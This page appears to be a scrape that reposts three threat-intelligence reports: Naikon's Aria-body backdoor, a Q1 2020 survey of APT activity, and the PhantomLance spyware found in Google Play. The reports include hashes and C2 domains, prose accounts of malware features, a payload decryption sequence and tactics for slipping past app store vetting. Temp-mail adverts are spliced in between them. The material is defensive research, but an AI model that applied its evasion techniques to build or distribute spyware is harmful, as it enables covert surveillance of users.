Naikon’s Aria | Securelist – 10 minute mail

Our colleagues at Checkpoint put together a fine research writeup on some Naikon resources and activity related to “aria-body” that we detected in 2017 and similarly reported in 2018. To supplement their research findings, we are summarizing and publishing portions of the findings reported in our June 2018 “Naikon’s New AR Backdoor Deployment to Southeast Asia”. This malware and activity aligns with much of what the Checkpoint researchers brought to light today.

The Naikon APT became well-known in May 2015, when our public reporting first mentioned and then fully described the group as a long running presence in the APAC region. Even when the group shutdown much of their successful offensive activity after years of campaigns, Naikon maintained several splinter campaigns. Matching malware artifacts, functionality, and targeting demonstrates that the group continues to wage cyber-espionage campaigns in the South China Sea region during 2018.

“Aria-Body” or “AR” is a set of backdoors that maintain compilation dates between January 2017 and February 2018. It can be particularly difficult to detect, as much of this code operates in memory, injected by other loader components without touching disk. We trace portions of this codebase back to “xsFunction” exe and dll modules used in Naikon operations going back to 2012, as their compiled modules implement a subset of the xsFunction feature set. In all likelihood, this new backdoor and related activity is an extension of or merge with the group’s “Paradir Operation”. In the past, the group targeted communications and sensitive information from executive and legislative offices, law enforcement, government administrative, military and intelligence organizations within Southeast Asia. In many cases we have seen that these systems also were targeted previously with PlugX and other malware. So, the group has evolved bit since 2015, and their activity targeting these same profiles continues into 2018. We identified at least a half dozen individual variants from 2017 and 2018.

Technical Details

It seems clear that the same codebase has been reused by Naikon since at least 2012, and recent AR backdoors were built from that same code. Their use was tightly clustered in previously and heavily Naikon-targeted organizations, again lending confidence to clustering these resources and activity with previous “Naikon”.


Naikon’s new AR backdoor is a dll loaded into any one of multiple processes, providing remote access to a system. AR load attempts have been identified within processes with executable images listed here:

  • c:windowssystem32svchost.exe
  • c:windowssyswow64svchost.exe
  • c:program fileswindows ntaccessoriesservices.exe
  • c:usersdellappdataroamingmicrosoftwindowsstart menuprogramsstartupacrobat.exe
  • c:alphazawgyisvchost.exe

Because this AR code is injected into processes, the yara rule provided in the Appendix is best run against memory dumps of processes maintaining a main image in the list above. The AR modules have additionally been seen in some others, including “msiexec.exe” processes.

Below are characteristics of the oldest AR and the newest known AR component in our collection.

MD5 c766e55c48a4b2e7f83bfb8b6004fc51
SHA256 357c8825b3f03414582715681e4e0316859b17e702a6d2c8ea9eb0fd467620a4
CompiledOn Tue Jan  3 09:23:48 2017
Type PE32 DLL
Internal name TCPx86.dll
Size 176kb
Exports AzManager, DebugAzManager
MD5 2ce4d68a120d76e703298f27073e1682
SHA256 4cab6bf0b63cea04c4a44af1cf25e214771c4220ed48fff5fca834efa117e5db
CompiledOn Thu Feb 22 10:04:02 2018
Type PE32 DLL
Internal Name aria-body-dllX86.dll
Size 204kb
Exports AzManager, DebugAzManager

When the dll is loaded, it registers a Windows class calling a specific Window procedure with a removable drive check, a CONNECT proxied callback to its main C2, an IP location verification against checkip.amazonaws[.]com, and further communications with a C2. Some previous modules’ flow may include more or less system information collection prior to the initial callback.

The most recent version of the backdoor utilizes another Window procedure to implement a raw input device based keystroke collector. This keylogger functionality was newly introduced to the malware code in February 2018, and was not present in previous versions.

The approximately 200 – 250kb AR backdoor family provides a familiar and slightly changing functionality set per compiled module. Because Checkpoint covers the same technical points in their post, we provide this simple summary list:

  • Persistence handling
  • File and directory handling
  • Keylogging
  • Shell/Process Management
  • Network activity and status listing and management
  • System information collection and management
  • Download management
  • Windows management
  • Extension management
  • Location/IP verification
  • Network Communications over HTTP

Similarities to past Naikon components

Naikon components going back to 2012 maintain heavy similarities with the current “Aria-body” modules. Not only is some of the functionality only lightly modified, but the same misspellings in error logging remains in their codebase. Let’s examine an older 2013 Naikon module and a newer 2017 Naikon AR module here.

It’s clear that the underlying codebase continues to be deployed:

e09254fa4398fccd607358b24b918b63, CompiledOn: 2013:09:10 09:00:15

c766e55c48a4b2e7f83bfb8b6004fc51, CompiledOn: 2017:01:03 09:23:48

Kudos to the Checkpoint researchers for providing new details of the Naikon story into the public discussion.

For reference, some hashes and a YARA rule are provided here. More incident, infrastructure, IOCs, and details have been and are available to our threat intel customers (please, contact [email protected]).

Indicators of compromise

AR aria-body dll
c766e55c48a4b2e7f83bfb8b6004fc51
2ce4d68a120d76e703298f27073e1682

Loaders and related Naikon malware
0ed1fa2720cdab23d969e60035f05d92
3516960dd711b668783ada34286507b9

Verdicts – 2018 and Later
Trojan.Win32.Generic.gen
Trojan.Win32.SEPEH.gen
DangerousObject.Multi.Generic
Backdoor.Win64.Agent.h*
Backdoor.Win32.Agent.m*
Trojan-Downloader.Win32.Agent.x*

YARA Rules


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

APT trends report Q1 2020 – 10 minute mail

For more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q1 2020.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact ‘[email protected]’.

Given the exceptional situation the world is living in because of the COVID-19 pandemia, it is mandatory we to start with a summary of how APT groups have been abusing this topic for different types of attacks.

COVID-19 APT activity

Since the World Health Organization (WHO) declared the COVID-19 a pandemic, this topic has received increased attention from different attackers. Many of the phishing scams we’ve seen have been launched by cybercriminals trying to cash-in on people’s fears about the virus.  However, the list of attackers also includes APT threat actors such as Kimsuky, APT27, Lazarus or ViciousPanda who, according to OSINT, have used COVID-19-themed lures to target their victims. We recently discovered a suspicious infrastructure that could have been used to target health and humanitarian organizations, including the WHO. Even though the infrastructure cannot be attributed to any particular actor at the moment, and was registered before the COVID-19 crisis in June 2019, according to some private sources it might be related to the DarkHotel actor. However, we cannot confirm this information at the moment. Interestingly, some groups have used the current situation to try to soften their reputation by declaring that they would not target health organizations during the crisis.

There are different publications reporting activity related to other APT actors using this lure, but in general, we do not believe this implies a meaningful change in terms of TTPs other than using a trendy topic for luring victims. We are closely monitoring the situation.

The most remarkable findings

In January 2020, we discovered a watering-hole utilizing a full remote iOS exploit chain. This site appears to have been designed to target users in Hong Kong, based on the content of the landing page. While the exploits currently being used are known, the actor responsible is actively modifying the exploit kit to target more iOS versions and devices. We observed the latest modifications on February 7. The project is broader than we initially thought, supporting an Android implant, and probably supporting implants for Windows, Linux, and MacOS. For the time being, we are calling this APT group TwoSail Junk. We believe this is a Chinese-speaking group; it maintains infrastructure mostly within Hong Kong, along with a couple of hosts located in Singapore and Shanghai. TwoSail Junk directs visitors to its exploit site by posting links within the threads of forum discussions, or creating new topic threads ofтtheir own. To date, dozens of visits were recorded from within Hong Kong, with a couple from Macau. The technical details around the functionality of the iOS implant, called LightSpy, and related infrastructure, reveal a low-to-mid capable actor. However, the iOS implant is a modular and exhaustively functional iOS surveillance framework.

Russian-speaking activity

In January, a couple of recently compiled SPLM/XAgent modules were detected in an Eastern European telecoms company. The initial point of entry is unknown, as is their lateral movement within this organization. It has become rare to identify SPLM infections, compared to past levels of Sofacy activity, so it seems that portions of this network may have been infected for some time. In addition to these SPLM modules, Sofacy also deployed .NET XTUNNEL variants and their loaders. These 20KB XTUNNEL samples themselves seem minimal in comparison to past XTUNNEL samples, which weighed in at 1-2MB. This shift to C# by the long-standing Sofacy XTunnel codebase reminds us of Zebrocy’s practice of re-coding and innovating long-used modules in multiple languages.

Gamaredon, a well-known APT group that has been active since at least 2013, has traditionally focused on Ukrainian entities. In recent months we have observed a campaign, made up of different waves, that has also been reported by multiple researchers on different social networks. The attackers sent malicious documents with remote template injection, resulting in a multi-level infection scheme to deploy a malicious loader that periodically contacts a remote C2 to download additional samples. Based on past research, we know that the Gamaredon’s toolkit includes many different malware artefacts, developed to achieve different goals. These include scanning drives for specific system files, capturing screenshots, executing remote commands, downloading additional files and managing the remote machine with programs such as UltraVNC. In this case, we observed an interesting new second stage payload that includes spreading capabilities, that we call “Aversome infector”. This malware seems to have been developed to maintain a strong persistence in the target network and to move laterally by infecting Microsoft Word and Excel documents on external drives.

Chinese-speaking activity

CactusPete is a Chinese-speaking cyber-espionage group active since at least 2012 characterized by medium-level technical capabilities. Historically, this threat actor has targeted organizations within a limited range of countries – South Korea, Japan, the US and Taiwan. At the end of 2019 the group seemed to shift towards a heavier focus on Mongolian and Russian organizations. CactusPete offensive activity against the Russian defense industry and Mongolian government appears to be mostly delineated from its Russian-Mongolian commercial and border relationships. However, one bait exploit document dropping its Flapjack backdoor (tmplogon.exe, primarily focused on new Russian targets) is authored in Mongolian. The group’s broadening of techniques, exploit re-purposing, targeting shift and possible expansion suggests changes in the group’s resources and operations.

Rancor is a group that has been publicly reported since 2018, with connections to DragonOK. This actor traditionally had a focus on Southeast Asian targets, namely Cambodia, Vietnam and Singapore. We noted several updates to the group’s activity in the last few months, namely the discovery of a new variant of the Dudell malware that we are calling ExDudell, a new tool for bypassing UAC (User Account Control), and new infrastructure utilized in the attacks. Apart from this, we have also identified that the initial lure documents that were previously sent via mail, are now found in the Telegram Desktop directory, suggesting the group is possibly making a shift in its initial delivery method.

In 2019, we detected activity by an unknown actor at the time deploying watering holes on websites representing Tibetan interests, fooling victims into installing fake Adobe Flash updates hosted on a GitHub repository. Kaspersky thwarted the attack by coordinating a takedown of this repository with GitHub. After a brief period of inactivity, we detected a new round of watering holes featuring a renewed toolset. We decided to call the group behind this activity Holy Water.

The threat actor’s unsophisticated but creative toolset has been evolving a lot since the inception date, may still be in development, and leverages Sojson obfuscation, NSIS installer, Python, open-source code, GitHub distribution, Go language, as well as Google Drive-based C2 channels.

Middle East

We recently detected a new, ongoing data exfiltration campaign targeting victims in Turkey that started in February 2020. While StrongPity’s TTPs in terms of targeting, infrastructure and infection vector haven’t changed, we observed a somewhat peculiar change in the documents they attempt to exfiltrate. In this campaign, StrongPity updated its latest signature backdoor, named StrongPity2, and added more files to exfiltrate to its list of common Office and PDF documents, including Dagesh Pro Word Processor files used for Hebrew dotting, RiverCAD files used for river flow and bridge modelling, plain-text files, archives as well as GPG encrypted files and PGP keys.

In March, we discovered a targeted campaign to distribute Milum, a Trojan designed to gain remote control of devices in target organizations, some of which operate in the industrial sector. The first signs of this operation, which we have dubbed WildPressure, can be traced back to August 2019; still, the campaign remains active. The Milum samples we have seen so far do not share any code similarities with any known APT campaigns. The malware provides attackers with remote control over infected devices, allows downloading and executing commands, collecting and exfiltrating information and installing upgrades in the malware.

In late December 2019, Kaspersky Threat Attribution Engine detected a new variant of the Zerocleare wiper that had possibly been used in targeted attacks on energy sector targets in Saudi Arabia. This quarter, we identified a new variant of this wiper, called Dustman. It is similar to Zerocleare in terms of wiping and distribution, but changes in variables and technical names suggest this might have been in readiness for a new wave of attacks specifically targeting Saudi Arabia’s energy sector, based on messages embedded in the malware and the mutex created by it. The PDB file of the Dustman wiper suggested that this destructive code was the release edition and was ready for deployment in a target network. These changes coincided with the New Year holidays, during which many employees take time off to celebrate. Shamoon was delivered with similar timing in 2012 during Ramadan celebrations.

Southеast Asia and Korean Peninsula

A Lazarus campaign outlined by the Italian security company Telsy in November 2019 allowed us to find a connection to previous activity from the group targeting cryptocurrency businesses. The malware mentioned on Telsy’s blog is a first stage downloader that has been observed since mid-2018. We found that the second stage malware is a variant of Manuscrypt, uniquely attributed to Lazarus, deploying two types of payloads. The first is a manipulated Ultra VNC program, and the second is a multi-stage backdoor. This type of multi-stage infection procedure is typical of the Lazarus group’s malware, especially when using the Manuscrypt variant. In this campaign, our telemetry indicates that the Lazarus group attacked cryptocurrency businesses in Cyprus, the US, Taiwan and Hong Kong, and the campaign extended until the beginning of 2020.

Kimsuky, an actor we have been tracking since 2013, was especially active during 2019. In December, Microsoft took down 50 domains used by the group and filed a lawsuit against the attackers in a Virginia court. However, the group has continued its activity without significant changes. We recently discovered a new campaign where the actor used a decoy image themed around New Year’s greetings that delivers its old downloader with a new evolved next-stage payload designed to steal information that uses a new encryption method.

At the end of January, we stumbled upon a malicious script exploiting an Internet Explorer vulnerability, CVE-2019-1367. After closely examining the payload and finding connections with previous activity, we concluded that DarkHotel was behind this campaign, probably in progress since 2018. The campaign saw DarkHotel utilize a multi-stage binary infection phase using home-brewed malware. The initial infection creates a downloader which fetches another downloader to collect system information and fetch the final backdoor only for high-value victims. DarkHotel used a unique combination of TTPs in this campaign. The threat actor used diverse infrastructure to host malware and to control infected victims, including a compromised web server, a commercial hosting service, a free hosting service and a free source code tracking system. We were able to confirm targeted companies in South Korea and Japan in this campaign.

In March, researchers from Google revealed that a group of hackers used five zero-days to target North Koreans and North Korean-focused professionals in 2019. The group exploited flaws in Internet Explorer, Chrome, and Windows with phishing emails that carried malicious attachments or links to malicious sites, as well as watering-hole attacks. We were able to match two of the vulnerabilities – one in IE and one in Windows – to DarkHotel.

FunnyDream is a campaign that started in mid-2018, targeting high-profile entities in Malaysia, Taiwan and the Philippines, with the majority of victims in Vietnam. Our analysis revealed that it’s part of a wider campaign that stretches back a few years and targets governments, and specifically foreign organizations, of countries in Southeast Asia. The attacker’s backdoor downloads and uploads files from/to a C2, executes commands and runs new processes in the victim. It also collects information about other hosts on the network and is delivered to new hosts through remote execution utilities. The attacker also used an RTL backdoor and Chinoxy backdoor. The C2 infrastructure has been active since mid-2018 and domains show an overlap with the FFRAT malware family. In a number of cases, indications suggest the backdoor was delivered via a previous long-term compromise. The campaign is still active.

Operation AppleJeus was one of the more notable campaigns of Lazarus, and the first time the actor targeted macOS targets. Our January follow-up research revealed significant changes to the group’s attack methodology: homemade macOS malware and an authentication mechanism to carefully deliver the next-stage payload, as well as loading the next-stage payload without touching the disk. To attack Windows victims, the group has elaborated a multi-stage infection procedure and significantly changed the final payload. We believe that Lazarus has been more careful in its attacks since the release of Operation AppleJeus and has employed a number of methods to avoid detection. We identified several victims in the UK, Poland, Russia and China. Moreover, we were able to confirm that several of the victims are linked to cryptocurrency organizations.

Roaming Mantis is a financially motivated actor first reported in 2017, when it used SMS to distribute its malware to Android devices based in South Korea. Since then, the scope of the group’s activities has widened considerably, supporting 27 languages, targeting iOS as well as Android, and even mining cryptocurrency. The actor also added new malware families, including Fakecop and Wroba.j to its arsenal, and is still active using ‘SMiShing‘ for Android malware distribution. In a recent campaign it distributed malicious APKs masquerading as popular couriers and customized for the targeted countries, including Japan, Taiwan, South Korea and Russia.

Other interesting discoveries

TransparentTribe started using a new module named USBWorm at the beginning of 2019, as well as improving its custom .NET tool named CrimsonRAT. Based on our telemetry, USBWorm was used to infect thousands of victims, most of them located in Afghanistan and India, providing the attacker with the ability to download and execute arbitrary files, spread to removable devices and steal files of interest from infected hosts even those disconnected from the internet. As we previously reported, this group mainly focuses on military targets, which are usually compromised with Office documents armed with malicious VBA and open-source malware like Peppy RAT and CrimsonRAT. In its new campaign, which is still active, we noticed the group’s focus shift more towards targeting entities located in Afghanistan in addition to India. Transparent Tribe has also developed a new implant designed to infect Android devices, a modified version of the AhMyth Android RAT which is open source malware available on GitHub.

During the last months of 2019, we observed an ongoing campaign conducted by Fishing Elephant. The group continues to use both Heroku and Dropbox in order to deliver its tool of choice, AresRAT. We discovered that the actor incorporated a new technique into its operations that is meant to hinder manual and automatic analysis – geo-fencing and hiding executables within certificate files. During our research, we also detected a change in victimology that may reflect the current interests of the threat actor: the group is targeting government and diplomatic entities in Turkey, Pakistan, Bangladesh, Ukraine and China.

Final thoughts

While the threat landscape isn’t always full of “groundbreaking” events, when we cast our eyes back over the activities of APT threat actors, there are always interesting developments.  Our regular quarterly reviews are intended to highlight the key developments.

These are some of the main trends that we’ve seen this year so far.

  • It’s clear from the activities of various APT groups, including CactusPete, LightSpy, Rancor, Holy Water, TwoSail Junk and others that geo-politics continues to be an important driver of APT activity. This was also underlined this quarter by the UK National Cyber Security Centre laying responsibility for disruptive attacks on Georgia at the feet of Russia’s military intelligence service, indictments in the US of two Chinese nationals for laundering $100 million in cryptocurrency on behalf of North Korea and the alleged ‘catfishing’ of IDF soldiers by Hamas.
  • Financial gain remains a motive for some threat actors, as evidenced by the activities of Lazarus and Roaming Mantis.
  • Southeast Asia is the most active region in terms of APT activities, including established actors such as Lazarus, DarkHotel and Kimsuky, and newer groups such as Cloud Snooper and Fishing Elephant.
  • APT threat actors such as CactusPete, TwoSail Junk, FunnyDream, DarkHotel continue to exploit software vulnerabilities.
  • APT threat actors continue to include mobile implants in their arsenal.
  • APT threat actors such as (but not limited to) Kimsuky, Hades and DarkHotel, as well as opportunistic criminals, are exploiting the COVID-19 pandemic.

All in all, we see the continuous growth of activity in Asia and how some of the actors we called newcomers are now well established. On the other hand, the more traditional advanced actors seem to be more and more selective in their operations, probably following a change of paradigm. The use of mobile platforms for infections and the distribution of malware is on the rise. Every actor seems to have some artefacts for these platforms and in some campaigns they are the main target.

COVID-19 is clearly top of everyone’s minds at the moment and APT threat actors have also been seeking to exploit this topic in spear-phishing campaigns.  We do not believe this represents a meaningful change in terms of TTPs: they’re simply using it as a newsworthy topic to lure their victims. However, we are closely monitoring the situation.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Hiding in plain sight: PhantomLance walks into a market – 10 minute mail

In July 2019, Dr. Web reported about a backdoor trojan in Google Play, which appeared to be sophisticated and unlike common malware often uploaded for stealing victims’ money or displaying ads. So, we conducted an inquiry of our own, discovering a long-term campaign, which we dubbed “PhantomLance”, its earliest registered domain dating back to December 2015. We found dozens of related samples that had been appearing in the wild since 2016 and had been deployed in various application marketplaces including Google Play. One of the latest samples was published on the official Android market on November 6, 2019. We informed Google of the malware, and it was removed from the market shortly after.

The latest example of spyware in Google Play disguised as a browser cleaner

During our investigation, we discovered various overlaps with reported OceanLotus APT campaigns. Thus, we found multiple code similarities with the previous Android campaign, as well as macOS backdoors, infrastructure overlaps with Windows backdoors and a few cross-platform resemblances.

Besides the attribution details, this document describes the actors’ spreading strategy, their techniques for bypassing app market filters, malware version diversity and the latest sample deployed in 2020, which uses Firebase to decrypt the malicious payload.

Our report is broken down into several sections.

  1. Malware versions – technical description of versions found, their features and relationships between them.
  2. Spread – information on specific tactics used by the threat actors for distributing their malware.
  3. Infrastructure – further details on uncovered infrastructure pieces as well as overlaps found.
  4. Victimology – thoughts on the actors’ interests in choosing their targets.
  5. Overlaps with previous campaigns – details of similarities with all related campaigns that we have identified.

More information on PhantomLance is available to customers of Kaspersky Intelligence Reporting. For more information, contact [email protected]

Malware versions

For the purposes of the research, we divided samples we found into a series of “versions” based on technical complexity: from the basic Version 1 to the highly sophisticated Version 3. Note that they do not fully correlate with the chronological order of their appearance ITW: for example, we observed Version 1 samples in late 2019 and in 2017, the year that we also saw Version 3.

Functionality of all samples are similar – the main purpose of spyware was to gather sensitive information. While the basic functionality was not very broad, and included geolocation, call logs, contact access and SMS access, the application could also gather a list of installed applications, as well as device information, such as model and OS version. Furthermore, the threat actor was able to download and execute various malicious payloads, thus, adapting the payload that would be suitable to the specific device environment, such as Android version and installed apps. This way the actor is able to avoid overloading the application with unnecessary features and at the same time gather information needed.

Version 1

We attribute the latest Google Play sample (MD5: 2e06bbc26611305b28b40349a600f95c) to this version. This is a clear payload, and unlike the other versions, it does not drop an additional executable file. Our main theory about the reasons for all these versioning maneuvers is that the attackers are trying to use diverse techniques to achieve their key goal, to bypass the official Google marketplace filters. And achieve it they did, as even this version passed Google’s filters and was uploaded to Google Play Store in 2019 (see Spreading for details).

No suspicious permissions are mentioned in the manifest file; instead, they are requested dynamically and hidden inside the dex executable. This seems to be a further attempt at circumventing security filtering. In addition to that, there is a feature that we have not seen before: if the root privileges are accessible on the device, the malware can use a reflection call to the undocumented API function “setUidMode” to get permissions it needs without user involvement.

Note that this trick only works with Android SDK version 19 or higher.

Most of the aforementioned operations naturally require root access, but we believe that the root exploit may be delivered as payload in a server response to collected device info. Also, some of the applications that the malware mimics will have notified the user that they only work on rooted devices. For instance, Browser Cleaner can only clean up the browser cache if it is given root permissions.

Version 2

Specimens of this version were also detected in 2019 and earlier. One of the samples was located in Google Play Store in November 2019 and described in the Dr. Web blog. Based on our detection statistics and spotted version stamps, we believe that this version is a replacement for Version 3, which we did not observe in 2019.

Below are the most valuable points and main differences from the Version 1.

The malicious payload APK is now packed in an encrypted file in the assets directory and is decrypted by the first stage using an AES algorithm. A decryption key and initialization vector (IV) are located in the first 32 + 16 bytes of the encrypted payload.

After decryption, the asset file will look like this.

As you can see, before the APK magic, the file header contains strings that are used for making further reflection calls to payload methods. Here is the first-stage code fragment with explanations regarding the payload loading process.

All Version 2 payloads use the same package name, “com.android.play.games”, which probably mimics the official Google Play Games package, “com.google.android.play.games”.

Moreover, we spotted developer version stamps in decrypted payloads.

MD5 Developer version stamp
65d399e6a77acf7e63ba771877f96f8e 5.10.6084
6bf9b834d841b13348851f2dc033773e 5.10.6090
8d5c64fdaae76bb74831c0543a7865c3 5.10.9018
3285ae59877c6241200f784b62531694 5.10.9018
e648a2cc826707aec33208408b882e31 5.10.9018

It is worth mentioning payload manifests, which do not contain any permission requests. As stated in the description of Version 1, permissions required by the malicious features are granted via an undocumented Android API.

We have found two different certificates used for signing Version 2 payloads.

MD5 Certificate
6bf9b834d841b13348851f2dc033773e Serial Number: 0xa4ed88e620b8262e

Issuer: CN=Lotvolron

Validity: from = Wed Jan 20 11:30:49 MSK 2010

65d399e6a77acf7e63ba771877f96f8e
8d5c64fdaae76bb74831c0543a7865c3 Serial Number: 0xd47c08706d440384

Issuer: CN=Ventoplex

Validity: from = Wed Apr 13 05:21:26 MSK 2011

3285ae59877c6241200f784b62531694
e648a2cc826707aec33208408b882e31

Although validity dates look spoofed in both cases and do not point to any real deployment times, by analyzing all payload certificates, we discovered that the second one (Ventoplex) was used to sign Version 3 payloads as well.

Version 2.1

The latest samples of PhantomLance discovered in the early 2020 introduced a new technique for decrypting payloads: the malicious payload was shipped with its dropper, encrypted with AES. The key is not stored anywhere in the dropper itself but sent to the device using Google’s Firebase remote config system. The other technical features are very similar to the ones we observed in Version 2, so we tagged this generation as Version 2.1.

We were able to make a valid request to PhantomLance’s Firebase API. The response consisted of a JSON struct containing the AES decryption key, where the “code_disable” value is the decryption key for payload.

What is important, the dropper expects that the AES decryption key will be stored in a parameter named “code”, so this specific variant should not function properly. Besides, we noticed that Firebase previously returned one more field, named “conf_disable”, which has the same value as the “code_disable”, so we assume that the actors are still tinkering with this new feature.

Another interesting technique that the actors are trying to implement is a third-stage payload implant. The second-stage payload (MD5: 83cd59e3ed1ba15f7a8cadfe9183e156) contains an APK file named “data” (MD5: 7048d56d923e049ca7f3d97fb5ba9812) with a corrupted header in the assets path.

The second stage reads this APK file, decrypts it and rewrites its first 27 bytes as described below.

This results in an APK file (MD5: c399d93146f3d12feb32da23b75304ba) that appears to be a typical PhantomLance payload configured with already known C2 servers (cloud.anofrio[.]com, video.viodger[.]com, api.anaehler[.]com). This third-stage APK is deployed with a custom native library named “data.raw”, also stored at the assets path. This library is used for achieving persistence on the infected device and appears to be a custom daemonized ELF executable based on the open-source “daemon.c” Superuser tool component, while in previous samples, we saw MarsDaemon used for this purpose.

Code comparison of the library used to daemonize the third stage payload with daemon.c source code hosted on Github

Version 3

While we have found that Version 2 has been used as a replacement for this one, as we have not observed any new deployments of Version 3 in 2019, it still looks more advanced in terms of technical details than Version 2. According to our detection statistics and deployment dates on application markets, Version 3 was active at least from 2016 to 2018.

Below are the most valuable points and main differences between Version 3 and Version 2.

The first-stage dropper appears even more obfuscated than that in Version 2; it uses a similar way of decrypting the payload, but it has minor differences. The encrypted content is split into multiple asset files under 10256 bytes in size plus an encrypted config file, and contains payload decryption details.

Below is the payload decryption sequence.

  1. Decrypt the payload config file from the assets with both a hardcoded name and AES key.
  2. Read the following values from the decrypted payload config file in this order:
    • AES key for APK payload decryption
    • Class and method names for reflection calls to the payload
    • MD5 for APK payload integrity check
    • Number and names of the split APK payload parts
  3. Decrypt the APK payload header hardcoded in the first stage with the AES key from the payload config. Write it to the APK payload file.
  4. Using decrypted names of the split payload parts, decrypt their content and append them to the APK payload file one by one.
  5. Check the integrity of the resulting APK payload file by comparing with the MD5 value decrypted from the payload config.
  6. Load and run the APK payload.

The following reversed code fragment represents the actual payload decryption process.

Each Version 3 payload has the same package name, “com.android.process.gpsp”, and is signed with the same certificate (CN=Ventoplex), used to sign some of the Version 2 payloads.

The only developer version stamp that we have found in Version 3 payloads is “10.2.98”.

Another notable finding is the 243e2c6433815f2ecc204ada4821e7d6 sample, which we believe belongs to a Version 3 payload. However, no related dropper has been spotted in the wild, and unlike the other payloads, it is signed with a debug certificate and not obfuscated at all, revealing all variable/class/method names and even BuildConfig values. Our guess that this is a debug developer version that somehow got leaked.

As a conclusion to this technical review, it is worth saying that all payloads across the different versions, even Version 1, which is in fact a clear payload without a dropper, share a code structure and locations where sensitive strings, such as С2 addresses, are stored.

Spread

The main spreading vector used by the threat actors is distribution through application marketplaces. Apart from the com.zimice.browserturbo, which we have reported to Google, and  com.physlane.opengl, reported by Dr. Web, we have observed tracks indicating that many malicious applications were deployed to Google Play in the past and have now been removed.

These search results contain a link to already-removed malware in Google Play

Some of the applications whose appearance in Google Play we can confirm.

Package name Google Play persistence date (at least)
com.zimice.browserturbo 2019-11-06
com.physlane.opengl 2019-07-10
com.unianin.adsskipper 2018-12-26
com.codedexon.prayerbook 2018-08-20
com.luxury.BeerAddress 2018-08-20
com.luxury.BiFinBall 2018-08-20
com.zonjob.browsercleaner 2018-08-20
com.linevialab.ffont 2018-08-20

Besides, we have identified multiple third-party marketplaces that, unlike Google Play, still host the malicious applications, such as https://apkcombo[.]com, https://apk[.]support/, https://apkpure[.]com, https://apkpourandroid[.]com and many others.

Example of a malicious application with a description in Vietnamese that is still available in a third-party marketplace (hxxps://androidappsapk[.]co/detail-cham-soc-be-yeu-babycare/)

In nearly every case of malware deployment, the threat actors try to build a fake developer profile by creating a Github account that contains only a fake end-user license agreement (EULA). An example is the one below, reported by us to Google.

This Google Play page contains a fake developer email

 Here is a related Github account with the same handle, registered on October 17, 2019.

A Github profile that is part of the fake developer identity

The account contains only one report with one file described as some type of EULA.

During our extensive investigation, we spotted a certain tactic often used by the threat actors for distributing their malware. The initial versions of applications uploaded to app marketplaces did not contain any malicious payloads or code for dropping a payload. These versions were accepted because they contained nothing suspicious, but follow-up versions were updated with both malicious payloads and code to drop and execute these payloads. We were able to confirm this behavior in all of the samples, and we were able to find two versions of the applications, with and without a payload.

An example of this behavior can be seen in Ads Skipper (https://apkpure[.]ai/ads-skipper), in ApkPure.

Versions of Ads Skipper with (v. 2.0) and without (v. 1.0) a malicious payload in ApkPure

Third-party marketplaces like those mentioned in the table above often serve as a mirror for Google Play: they simply copy applications and metadata from Google Play to their own servers. Therefore, it is safe to assume that the samples listed in the table were copied from Google Play as well.

Infrastructure

While analyzing the С2 server infrastructure, we quickly identified multiple domains that shared similarities with previous ones but were not linked to any known malware samples. This allowed us to uncover more pieces of the attackers’ infrastructure.

Example of related infrastructure

Tracking PhantomLance’s old infrastructure, which dated back four years, we noticed that the expired domain names had been extended. The maintenance suggested that the infrastructure might be used again in the future.

Domain Registered Last updated
osloger[.]biz 2015-12-09 2019-12-01
log4jv[.]info 2015-12-09 2019-11-26
sqllitlever[.]info 2015-12-09 2019-11-26
anofrio[.]com 2017-05-16 2020-03-30
anaehler[.]com 2017-05-16 2020-03-30
viodger[.]com 2017-05-16 2020-04-07

The PhantomLance TTPs indicate that samples are configured only with subdomains as C2 servers, while most, but not all, parent domains do not have their own IP resolution. We checked the ones that did have a valid resolution and found that they all resolved to the same IP address: 188.166.203[.]57. It belongs to the DigitalOcean cloud infrastructure provider and, according to Domaintools, hosts a total of 129 websites.

Looking up records for this IP address in our passive DNS database suggests that a few dozen of these websites are legitimate, as well as the aforementioned PhantomLance domains and two more interesting overlaps with OceanLotus infrastructure:

  • browsersyn[.]com: known domain used as a C2 in a previously publicly reported sample (MD5: b1990e19efaf88206f7bffe9df0d9419) considered by the industry to be the OceanLotus APT.
  • cerisecaird[.]com: privately received information indicates that this domain is related to OceanLotus as well.

Victimology

We have observed around 300 infection attacks on Android devices in India, Vietnam, Bangladesh, Indonesia, etc. starting in 2016. Below is a rough cartographic representation of countries with top attempted attacks.

We have also seen a number of detections in Nepal, Myanmar and Malaysia. As you can see, this part of South Asia seems to be targeted by the actors the most.

Note that due to the chosen distribution vector (publication of malicious samples on publicly available application stores), there should be secondary infection of random victims not directly related to the actors’ interests.

To get more details on targeted victims, we looked at the types of applications that the malware mimicked. Apart from common luring applications, such as Flash plugins, cleaners and updaters, there were those that specifically targeted Vietnam.

  • luxury.BeerAddress – “Tim quan nhau | Tìm quán nhậu” (“Find each other | Find pubs” in Vietnamese). An application for finding the nearest pub in Vietnam.
  • codedexon.churchaddress – “Địa Điểm Nhà Thờ” (“Church Place”)

    Publisher description (hxxps://apk.support/app-en/com.codedexon.churchaddress) translated from Vietnamese:
    Information about churches near you or the whole of Vietnam, information about patronies, priests, phone numbers, websites, email, activities, holidays…

  • bulknewsexpress.news – “Tin 247 – Đọc Báo Hàng Ngày” (“Read Daily Newspaper”)

Mimics the Vietnamese www.tin247.com mobile news application.

Overlaps with previous campaigns

In this section, we provide a correlation of PhantomLance’s activity with previously reported campaigns related to the OceanLotus APT.

OceanLotus Android campaign in 2014-2017

